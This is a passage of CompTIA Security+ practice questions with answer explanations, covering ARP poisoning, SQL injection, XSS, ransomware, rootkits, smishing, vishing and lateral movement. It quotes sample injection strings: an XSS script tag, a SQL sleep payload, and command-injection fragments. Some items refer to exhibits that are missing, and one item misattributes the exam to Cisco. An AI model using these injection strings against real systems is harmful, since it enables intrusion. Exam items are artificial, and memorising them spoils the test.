The trap here is that candidates confuse ARP spoofing with DNS-based attacks (like DNS amplification) because both involve 'redirecting' traffic, but ARP spoofing operates at Layer 2 (MAC address manipulation) on the local subnet, while DNS amplification is a Layer 3/4 volumetric attack targeting external resolvers.
How to eliminate wrong answers
Option B is wrong because DNS amplification is a volumetric DDoS attack that exploits open DNS resolvers to flood a target with large responses, not a local network attack that causes traffic to reach the wrong device on the same subnet. Option C is wrong because a replay attack involves capturing and retransmitting valid authentication data (e.g., Kerberos tickets or NTLM hashes) to gain unauthorized access, not manipulating ARP tables to redirect traffic. Option D is wrong because port scanning is a reconnaissance technique used to discover open ports and services on a host, not an attack that alters the flow of traffic or causes packets to reach the wrong MAC address.
A vulnerability scan reports a critical finding on a legacy application server. The security team verifies that the flagged package is installed, but the vulnerable code path is disabled by configuration and cannot be exploited in the current deployment. The vendor will not support a patch until next quarter. What is the best next step?
A.Ignore the finding because the scanner produced a false positive
B.Request a risk exception and document compensating controls until patching is possible
C.Disable the vulnerability scanner to prevent repeated alerts
D.Immediately retire the server even though the application is still business-critical
AnswerB
This is the best response because the team has confirmed the issue cannot be immediately remediated, but the organization still needs formal risk ownership. A risk exception documents the temporary acceptance, while compensating controls capture what is being done to reduce exposure until a supported patch becomes available. That is the right balance between operational constraints and security governance.
Why this answer
Option B is correct because the vulnerability is real (the package is installed), but the risk is mitigated by a compensating control (the vulnerable code path is disabled). A risk exception formally documents this compensating control and the planned patch timeline, ensuring the finding is tracked and not forgotten. This aligns with the SY0-701 objective of managing risk through formal acceptance and compensating controls when immediate remediation is not possible.
Exam trap
The trap here is that candidates confuse a 'false positive' (scanner error) with a 'vulnerability that is mitigated by a compensating control' — the scanner is correct, but the risk is lower than the raw CVSS score suggests.
How to eliminate wrong answers
Option A is wrong because the scanner did not produce a false positive; the vulnerable package is indeed installed, and the scanner correctly identified it. The fact that the code path is disabled is a compensating control, not a false positive. Option C is wrong because disabling the vulnerability scanner would eliminate visibility into all findings, including legitimate ones, and violates security monitoring best practices.
Option D is wrong because retiring a business-critical server without a replacement or migration plan would cause unacceptable operational impact, and the risk is already mitigated by the disabled code path.
A security team suspects a rootkit after seeing hidden processes, boot-time persistence, and altered system files on a laptop. What is the best next step after confirming the suspicion?
A.Run a quick cleanup script and return the laptop to the user
B.Disconnect the laptop, then reimage it from a known-good source
C.Disable the user account and leave the device in place
D.Delete the suspected hidden files manually from Windows Explorer
AnswerB
A rootkit can hide deeply in the system, so reimaging from trusted media is the safest way to restore integrity.
Why this answer
Once a rootkit is confirmed, the system's integrity is compromised at the kernel or boot level, making any software-based cleanup unreliable. Reimaging from a known-good source ensures all malicious code, including bootkits and hidden processes, is completely eradicated. This aligns with the SY0-701 domain of incident response, where containment and eradication require a trusted baseline.
Exam trap
The trap here is that candidates may think a cleanup script or manual deletion is sufficient, but rootkits operate below the OS level, making reimaging the only reliable method to restore integrity.
How to eliminate wrong answers
Option A is wrong because a quick cleanup script cannot remove rootkits that operate at ring 0 or modify the Master Boot Record (MBR); the malware will persist or reinfect. Option C is wrong because disabling the user account does not remove the rootkit from the laptop, leaving the device compromised and potentially spreading to other systems on the network. Option D is wrong because manually deleting files from Windows Explorer cannot remove kernel-mode rootkits that hide their processes and files from user-mode tools, and it may trigger anti-forensic mechanisms.
A security team is reviewing vulnerabilities in a web application. Which three of the following are common web application vulnerabilities that should be addressed? (Choose three.)
Cross-site scripting (XSS) is a common web application vulnerability where an attacker injects malicious scripts into web pages viewed by other users, often through input fields or URL parameters. SQL injection occurs when an application improperly sanitizes user input in SQL queries, allowing attackers to manipulate the database. XML external entity (XXE) injection exploits poorly configured XML parsers to process external entities, leading to data disclosure or server-side request forgery.
These three are consistently listed in the OWASP Top 10 as critical web application flaws.
Exam trap
Cisco often tests the distinction between web application vulnerabilities (like XSS, SQLi, XXE) and network-level attacks (like ARP poisoning, DNS cache poisoning, evil twin), so candidates mistakenly select network attacks because they are familiar, but they are not specific to web applications.
Users on a branch VLAN intermittently reach a fake login page even though DNS records have not changed. A packet capture shows the default gateway MAC address changing every 60 seconds, and the switch logs list repeated unsolicited ARP replies from one workstation. Which attack is most likely?
A.DNS poisoning, because name resolution is directing users to the wrong server.
B.ARP poisoning, because forged ARP replies are associating the gateway IP with the attacker's MAC address.
C.Replay attack, because previously captured traffic is being resent to the network.
D.Denial of service, because the branch users cannot reliably reach websites.
AnswerB
ARP poisoning is the best fit because the attacker is sending unsolicited ARP replies to rewrite the local IP-to-MAC mapping. The changing gateway MAC address and repeated ARP activity are classic signs of a man-in-the-middle setup on a switched LAN. Once traffic is redirected through the attacker, fake login pages and credential interception become possible.
Why this answer
The repeated unsolicited ARP replies from one workstation, combined with the default gatewayMAC address changing every 60 seconds, directly indicate an ARP poisoning attack. The attacker is sending forged ARP replies to associate the gateway IP with its own MAC address, causing traffic destined for the gateway to be intercepted. This allows the attacker to redirect users to a fake login page without altering DNS records.
Exam trap
The trap here is that candidates see 'fake login page' and 'DNS records have not changed' and jump to DNS poisoning, but the key indicator is the MAC address changing every 60 seconds, which is a classic sign of ARP poisoning, not DNS manipulation.
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves altering DNS records or cache entries to redirect name resolution, but the scenario explicitly states DNS records have not changed and the packet capture shows MAC address changes, not IP resolution changes. Option C is wrong because a replay attack resends captured legitimate traffic to impersonate a user or disrupt a session, but here the attacker is actively sending unsolicited ARP replies to redirect traffic, not replaying old packets. Option D is wrong because a denial of service attack would prevent users from reaching websites entirely, but the users intermittently reach a fake login page, indicating traffic is being redirected, not blocked.
Several users on the same subnet report intermittent loss of access to the default gateway. A packet capture shows repeated unsolicited ARP replies mapping the gateway IP address to a different MAC address. Traffic is occasionally sent through an unknown workstation. What attack is most likely occurring?
ARP poisoning forges address resolution replies so victims map the gateway IP to the attacker MAC.
Why this answer
The attack is ARP poisoning (also known as ARP spoofing). The attacker sends unsolicited ARP replies to associate the gateway's IP address with the attacker's MAC address, causing traffic destined for the gateway to be redirected through the attacker's workstation. This results in intermittent connectivity as the attacker can forward or drop packets, and the repeated unsolicited replies overwrite the legitimate ARP cache entries on the victim hosts.
Exam trap
The trap here is confusing ARP poisoning with DNS cache poisoning because both involve 'poisoning' a cache, but ARP operates at Layer 2 (MAC addresses) while DNS operates at Layer 7 (domain names), and the symptoms of intermittent gateway access and unsolicited ARP replies are unique to ARP attacks.
How to eliminate wrong answers
Option B (DNS cache poisoning) is wrong because that attack corrupts DNS resolver caches to redirect domain names to malicious IP addresses, not to manipulate Layer 2 MAC-to-IP mappings via ARP. Option C (Replay attack) is wrong because a replay attack involves capturing and retransmitting valid data packets to impersonate a user or gain unauthorized access, not sending unsolicited ARP replies to redirect traffic. Option D (Amplification attack) is wrong because amplification attacks (e.g., DNS amplification, NTP amplification) exploit stateless protocols to flood a target with large responses from many servers, not to poison ARP caches on a local subnet.
A tester enters a crafted search term into an internal web application and sees no error message, but the page response always delays by exactly five seconds when the input includes a single quote followed by a conditional sleep function. The returned results look normal, so the tester repeats the request several times and the timing remains consistent. Which attack is most likely being attempted?
A.Reflected cross-site scripting, because the tester's input is being echoed back into the response.
B.Command injection, because the application is pausing while executing system-level sleep commands.
C.Time-based blind SQL injection, because the attacker is inferring database behavior from delayed responses.
D.Session fixation, because the tester is manipulating how the application handles user input over time.
AnswerC
The timing pattern is the critical clue. When an application does not reveal errors or data directly, an attacker can still infer whether injected SQL changes control flow by measuring response delays. A single quote plus a conditional sleep is a classic sign of time-based blind SQL injection. The normal-looking results and consistent pauses show the query is being influenced even without visible error output.
Why this answer
The consistent five-second delay triggered by a single quote followed by a conditional sleep function (e.g., ' OR SLEEP(5)) indicates a time-based blind SQL injection. The tester is inferring database behavior from response timing because the application does not display error messages or output differences, but the database executes a sleep command when the injected SQL is syntactically valid. This technique exploits the database's ability to conditionally pause execution, allowing an attacker to extract data bit by bit based on true/false conditions.
Exam trap
The trap here is that candidates confuse a time-based delay with command injection (Option B) because both involve a pause, but the key differentiator is the single quote syntax and the database-specific sleep function, not an OS-level command.
How to eliminate wrong answers
Option A is wrong because reflected cross-site scripting requires the tester's input to be echoed back in the HTML/JavaScript context, not a server-side delay; the absence of error messages and the consistent timing point to database-level behavior, not client-side script execution. Option B is wrong because command injection would involve system-level commands (e.g., 'ping -n 5 127.0.0.1') and typically shows a delay from the OS, not a database-specific sleep function triggered by a single quote; the application is a web application, not a command shell. Option D is wrong because session fixation involves an attacker forcing a known session ID on a victim to hijack their session later, not manipulating input to cause server-side delays; the tester's repeated requests and timing analysis are unrelated to session management.
Based on the exhibit, which finding should the security team remediate first?
A.LAP09 because user devices are always the easiest to patch
B.WEB01 because it is internet-facing and has a critical exploitable vulnerability
C.PRN01 because firmware issues can affect many users
D.FILE02 because internal servers are always more important than public ones
AnswerB
WEB01 should be remediated first because it is public-facing, rated critical, and already has a known exploit. Exposure and exploitability greatly increase risk, so this finding has the highest immediate urgency. When patching resources are limited, internet-facing critical vulnerabilities are typically prioritized before internal or low-severity issues.
Why this answer
WEB01 is internet-facing and has a critical exploitable vulnerability, meaning an attacker can directly compromise it from the public internet with minimal effort. This represents the highest risk because it combines high likelihood (exploit available) with high impact (full compromise of a public-facing server). Remediating this first aligns with the principle of prioritizing externally exposed systems with known critical flaws over internal or less severe issues.
Exam trap
The trap here is that candidates prioritize based on ease of remediation (A) or internal importance (D) instead of applying a risk-based approach that considers both the severity of the vulnerability and the exposure of the asset.
How to eliminate wrong answers
Option A is wrong because LAP09 being 'easiest to patch' does not equate to highest risk; patching ease is irrelevant when a critical internet-facing vulnerability exists. Option C is wrong because PRN01's firmware issue, while potentially affecting many users, is internal and typically lower severity than a critical remote code execution on a public server. Option D is wrong because internal servers are not inherently more important than public ones; the criticality and exposure of the vulnerability determine priority, not a blanket rule about server location.
A user forwards an email that says a shared document is available and must be reviewed within 10 minutes. The display name looks like a trusted vendor, but the Reply-To address points to a free webmail account. Which two details are strongest indicators that this is a phishing attempt? Select two.
Select 2 answers
A.The message creates a short deadline and pressures the user to act quickly.
B.The Reply-To address uses a free webmail domain instead of the vendor's corporate domain.
C.The message includes the company's logo and professional-looking formatting.
D.The email refers to a shared document that the user should review.
E.The message was received during normal business hours.
AnswersA, B
Urgency is a classic phishing tactic because it pushes recipients to react before verifying the request. A short deadline increases the chance that the user clicks a link or shares credentials without checking the sender or context.
Why this answer
Option A is correct because phishing attacks frequently use urgency and time pressure to bypass the victim's rational analysis, exploiting the psychological principle of scarcity to trigger impulsive clicks. The 10-minute deadline is a classic social engineering tactic to prevent the user from verifying the email's legitimacy through normal channels.
Exam trap
CompTIA often tests the distinction between easily spoofed visual elements (logos, formatting) and verifiable technical indicators (Reply-To domain mismatch, urgency cues) to catch candidates who rely on superficial appearance rather than email authentication mechanisms.
After a workstation reboot, users see many files renamed with random extensions. A ransom note demands cryptocurrency, and Volume Shadow Copies were deleted from the machine. What malware type is most likely?
A.Trojan, because the malware may have been disguised as a legitimate application.
B.Worm, because the malware likely spread automatically to other systems.
C.Ransomware, because the files were encrypted and payment was demanded.
D.Rootkit, because the attacker would want to hide persistence on the system.
AnswerC
Ransomware commonly encrypts files, deletes recovery options, and leaves a ransom note demanding payment. The random extensions and removed shadow copies are classic clues that the attacker wants to block restoration until payment is made.
Why this answer
The scenario describes files renamed with random extensions (indicating encryption), a ransom note demanding cryptocurrency, and deletion of Volume Shadow Copies (VSS) to prevent file recovery. These are hallmark behaviors of ransomware, specifically a crypto-ransomware variant that encrypts user data and removes backup copies to maximize extortion pressure.
Exam trap
The trap here is that candidates see 'files renamed' and 'ransom note' but may confuse the delivery method (Trojan) or propagation (Worm) with the actual malware type, which is defined by its payload—encryption for extortion—not how it arrived or spread.
How to eliminate wrong answers
Option A is wrong because a Trojan is a type of malware that disguises itself as legitimate software, but the core behavior here is file encryption and ransom demand, not just deception. Option B is wrong because a Worm self-replicates and spreads automatically across networks without user interaction, but the question focuses on the post-reboot encryption and ransom note, not propagation. Option D is wrong because a Rootkit is designed to hide its presence and maintain stealthy persistence, but the visible symptoms are encrypted files and a ransom demand, not hidden processes or stealth.
Based on the exhibit, which malware type best explains the behavior?
A.Trojan
B.Rootkit
C.Logic bomb
D.Spyware
AnswerB
The exhibit shows a hidden listener associated with PID 4, an unsigned driver, and a mismatch between user-mode process enumeration and kernel telemetry. Those are classic rootkit indicators because rootkits operate at a low level to conceal processes, ports, or files from standard tools. The suspicious driver name and kernel-level inconsistency are especially strong clues that the malware is trying to hide itself from the operating system and defenders.
Why this answer
A rootkit is designed to hide its presence and the presence of other malware by modifying the operating system's kernel or system calls, allowing it to evade detection by security tools. The exhibit likely shows behavior such as file hiding, process concealment, or system call interception, which are hallmarks of rootkit activity. This aligns with the SY0-701 objective on understanding malware types and their characteristics.
Exam trap
The trap here is that candidates often confuse a rootkit's stealth capabilities with a Trojan's deceptive delivery method, failing to recognize that the exhibit's focus on hiding and persistence at the OS level is unique to rootkits, not general malware types.
How to eliminate wrong answers
Option A (Trojan) is wrong because a Trojan disguises itself as legitimate software to trick users into installing it, but it does not inherently hide its presence or modify the kernel to evade detection; the exhibit's behavior of stealth and system-level concealment is not typical of a Trojan. Option C (Logic bomb) is wrong because a logic bomb is a piece of code that executes a malicious payload when specific conditions are met (e.g., a date or user action), but it does not actively hide itself or its processes; the exhibit's ongoing stealth behavior is inconsistent with a dormant trigger-based mechanism. Option D (Spyware) is wrong because spyware focuses on covertly collecting user data (e.g., keystrokes, browsing habits) and sending it to an attacker, but it does not typically modify the OS kernel or hide its own files and processes at the rootkit level; the exhibit's system-level concealment goes beyond spyware's typical user-space monitoring.
Based on the exhibit, which security issue should the analyst report first?
A.Outdated component, because the scan did not list software version details.
B.Exposed service, because VNC and the web admin interface are reachable from untrusted networks.
C.Weak permissions, because SSH requires password login only.
D.Default credentials, because the server is in the DMZ.
AnswerB
The most important issue is the exposed service because remote management interfaces are reachable from any source network, and VNC authentication is disabled. That combination creates a high-risk attack surface, especially for a server in the DMZ that stores sensitive customer information.
Why this answer
Option B is correct because the scan reveals that VNC (port 5900) and a web admin interface (port 443 or 8080) are exposed to untrusted networks, such as the internet. This violates the principle of least exposure, as these services are known attack vectors for remote code execution and credential theft. The analyst should prioritize this issue because an exposed service directly increases the attack surface and risk of unauthorized access, whereas other findings may be less immediately critical.
Exam trap
The trap here is that candidates often focus on missing version details (Option A) or default credentials (Option D) as the most critical finding, but CompTIA emphasizes that exposed services on untrusted networks pose the highest immediate risk because they are directly exploitable without requiring prior access.
How to eliminate wrong answers
Option A is wrong because the absence of software version details in the scan does not necessarily indicate an outdated component; it may simply mean the scanner could not fingerprint the version due to banner hiding or firewall restrictions. Option C is wrong because SSH requiring password login only is not inherently a weak permission; weak permissions refer to file or directory access controls, not authentication methods, and password-based SSH is still common in many environments. Option D is wrong because default credentials are not indicated by the server being in the DMZ; the scan does not show any evidence of default username/password usage, and the DMZ placement alone does not confirm this vulnerability.
A SOC analyst reviews an EDR alert on a Windows workstation. PowerShell was launched by a scheduled task, downloaded an encoded command from an external server, and then spawned rundll32.exe. No suspicious executable was written to disk. Which type of threat best fits this activity?
A.Trojan
B.Fileless attack
C.Rootkit
D.Worm
AnswerB
Fileless attacks often use trusted tools like PowerShell to run malicious code in memory without leaving a traditional executable behind.
Why this answer
The attack is fileless because it executes entirely in memory without writing a malicious executable to disk. PowerShell downloads an encoded command from an external server and spawns rundll32.exe to run code via DLL execution, leveraging living-off-the-land binaries (LOLBins) to evade traditional antivirus and disk-based detection.
Exam trap
The trap here is that candidates see 'downloaded an encoded command' and assume a file was written, but the key distinction is that no executable file was written to disk, making it a fileless attack rather than a Trojan or rootkit.
How to eliminate wrong answers
Option A is wrong because a Trojan is a malicious program disguised as legitimate software that typically writes a file to disk and requires user installation, whereas this attack uses a scheduled task to launch PowerShell and never writes a suspicious executable. Option C is wrong because a rootkit is designed to hide the presence of malware or maintain privileged access by modifying the operating system kernel or boot process, which is not indicated by the PowerShell-to-rundll32 chain and lack of persistence mechanisms described.
A web form stores a user's comment and later displays it to other users. A tester submits <script>alert(1)</script> and the script runs in the browser. What vulnerability is this?
A.SQL injection
B.Cross-site request forgery
C.Cross-site scripting
D.Command injection
AnswerC
The application reflects untrusted input into a page without proper encoding, allowing script execution.
Why this answer
The tester's input <script>alert(1)</script> is executed in the browser, which is the classic symptom of a stored (persistent) cross-site scripting (XSS) vulnerability. The web form fails to sanitize or encode user-supplied data before storing it and later rendering it in other users' browsers, allowing arbitrary JavaScript to run in the security context of the application's origin.
Exam trap
The trap here is that candidates may confuse XSS with SQL injection because both involve injecting malicious input, but XSS targets the browser's execution context while SQL injection targets the database query layer.
How to eliminate wrong answers
Option A is wrong because SQL injection involves injecting SQL commands into database queries (e.g., ' OR 1=1 --), not client-side script execution; the input here does not alter a database query. Option B is wrong because cross-site request forgery (CSRF) tricks a victim into performing an unintended action on an authenticated site, but the tester's input directly executes script in the browser without requiring a forged request. Option D is wrong because command injection targets server-side operating system commands (e.g., ; ls -la), not client-side JavaScript execution in the browser.
A user receives an SMS from 'IT Service Desk' saying their MFA enrollment expires today and includes a shortened link. Five minutes later, the user gets a phone call from the same number asking them to read back the code shown in the authenticator app so the ticket can be closed. Which two attack channels are used in this campaign? Select two.
Select 2 answers
A.Email phishing is used because the attacker is requesting a login action.
B.Smishing is used because the first lure arrives by text message.
C.Vishing is used because the follow-up request occurs by phone call.
D.Baiting is used because the attacker offers a free reward or device.
E.Tailgating is used because the attacker follows someone into a restricted area.
AnswersB, C
Smishing is phishing delivered through SMS or another text-based mobile messaging channel. The fake IT Service Desk text with a shortened link is a classic example because it attempts to get the user to click a link and interact outside the normal support process.
Why this answer
Option B is correct because the initial attack vector is an SMS message containing a shortened link, which is the definition of smishing (SMS phishing). The attacker uses this to create urgency and lure the victim into engaging with the MFA enrollment scam.
Exam trap
The trap here is that candidates may focus on the phone call as the only attack channel and overlook the initial SMS, or they may confuse smishing with vishing, not recognizing that both channels are used sequentially in a single campaign.
An employee receives an email from someone claiming to be from IT. The message says the employee must read back a one-time verification code so their mailbox can be 'repaired.' What social engineering technique is being used?
A.Tailgating, because the attacker is trying to enter a secure area physically.
B.Pretexting, because the attacker is using a fake identity and story to gain trust.
C.DDoS, because the message is designed to overwhelm the mailbox server.
D.Shoulder surfing, because the attacker is watching the screen from nearby.
AnswerB
The attacker is pretending to be IT and inventing a believable support reason to trick the victim into revealing a one-time code.
Why this answer
The attacker is using a fabricated identity (IT support) and a false scenario (mailbox repair requiring a verification code) to manipulate the employee into divulging sensitive information. This is the classic definition of pretexting, where the attacker creates a believable pretext to lower the victim's defenses and extract data or access.
Exam trap
The trap here is that candidates confuse pretexting with phishing, but pretexting specifically relies on a fabricated scenario or identity (the 'pretext') rather than a generic lure like a malicious link or attachment.
How to eliminate wrong answers
Option A is wrong because tailgating is a physical security attack where an unauthorized person follows an authorized individual into a restricted area, not a social engineering technique involving email or phone. Option C is wrong because a DDoS (Distributed Denial of Service) attack overwhelms a server with traffic to disrupt service, not to trick a user into revealing a code. Option D is wrong because shoulder surfing involves directly observing someone's screen or keyboard from close proximity to steal information, not using a remote email message.
NetFlow and authentication logs show one workstation opening SMB and WinRM sessions to many internal hosts within ten minutes. The same source also generates a sharp rise in Kerberos service-ticket requests and attempts to access administrative shares. Which three observations most strongly support lateral movement rather than normal admin activity? Select three.
Select 3 answers
A.A rapid burst of SMB and WinRM connections to many internal systems from one source host.
B.A sharp increase in Kerberos service-ticket requests from the same workstation.
C.Repeated attempts to access administrative shares such as ADMIN$ or C$.
D.Regular outbound DNS lookups for common internet services like time synchronization or content delivery.
E.A successful sign-in to the user's cloud email account from the employee's home network at lunchtime.
AnswersA, B, C
A sudden fan-out of administrative protocols from one workstation is a classic sign of lateral movement. Normal admin activity is usually more targeted and scheduled. A burst like this suggests an automated attempt to enumerate, authenticate, or execute remotely across the environment.
Why this answer
Option A is correct because a rapid burst of SMB and WinRM connections from a single workstation to many internal hosts is a classic indicator of lateral movement. Normal administrative activity typically involves targeted, sequential connections to specific systems for maintenance, not a broad, automated sweep. This pattern suggests an attacker using tools like PsExec or PowerShell remoting to propagate across the network.
Exam trap
The trap here is that candidates may confuse normal administrative tasks with malicious lateral movement, but the key differentiator is the rapid, broad, and automated nature of the connections, combined with the specific targeting of administrative shares and Kerberos ticket requests, which are not typical for routine admin work.